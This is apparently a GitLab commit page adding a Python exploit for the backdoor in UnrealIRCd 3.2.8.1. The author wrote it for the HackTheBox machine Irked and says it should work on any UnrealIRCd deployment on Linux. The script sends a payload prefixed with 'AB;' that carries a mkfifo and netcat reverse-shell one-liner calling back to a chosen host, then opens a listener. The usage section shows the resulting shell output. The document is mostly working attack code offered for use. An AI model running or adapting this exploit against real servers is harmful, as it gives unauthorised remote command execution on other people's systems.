Commit 3f2fe8b8 authored by 0xdf's avatar 0xdf

added unrealirc exploit

parent daf7a2e8
## Description
I recently ran into the need to exploit an [UnrealIRCd server](https://www.unrealircd.org/). Version 3.2.8.1 contains a backdoor which can provide RCE. There's already a [Metasploit exploit module](https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor) for the vulnerability, but I didn't really love the scripts I found out there for it. So I wrote my own.
While I developed this script for [Irked from HackTheBox](https://www.hackthebox.eu/home/machines/profile/163), it should be generic to any UnrealIRCd deployment on Linux, provided that a mkfifo reverse shell works on the target.
## Usage
Call the python script with four arguments to identify the target ip and port, and the callback ip and port you want to use. Then, wait and get a shell:
```
root@kali# ./unreal_3.2.8.1_exploit.py 10.10.10.117 6697 10.10.14.14 443
[*] Connecting to 10.10.10.117:6697
[*] Sending payload
[+] Payload sent. Closing socket.
[*] Opening listener. Callback should come within a minute
bash: cannot set terminal process group (634): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
```
#!/usr/bin/env python3
import socket
import subprocess
import sys
if len(sys.argv) != 5:
print(f"Usage: {sys.argv[0]} [target_ip] [target_port] [callback ip] [callback port]")
sys.exit()
rhost, rport, lhost, lport = sys.argv[1:]
print(f"[*] Connecting to {rhost}:{rport}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((rhost, int(rport)))
except:
print(f"[-] Failed to connect to {rhost}:{rport}")
sys.exit(1)
s.recv(100)
print("[*] Sending payload")
s.send(f"AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f\n".encode())
s.close()
print("[+] Payload sent. Closing socket.")
print("[*] Opening listener. Callback should come within a minute")
try:
ncsh = subprocess.Popen(f"nc -nl {lhost} {lport}", shell=True)
ncsh.poll()
ncsh.wait()
except:
print("\n[!] Exiting shell")
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment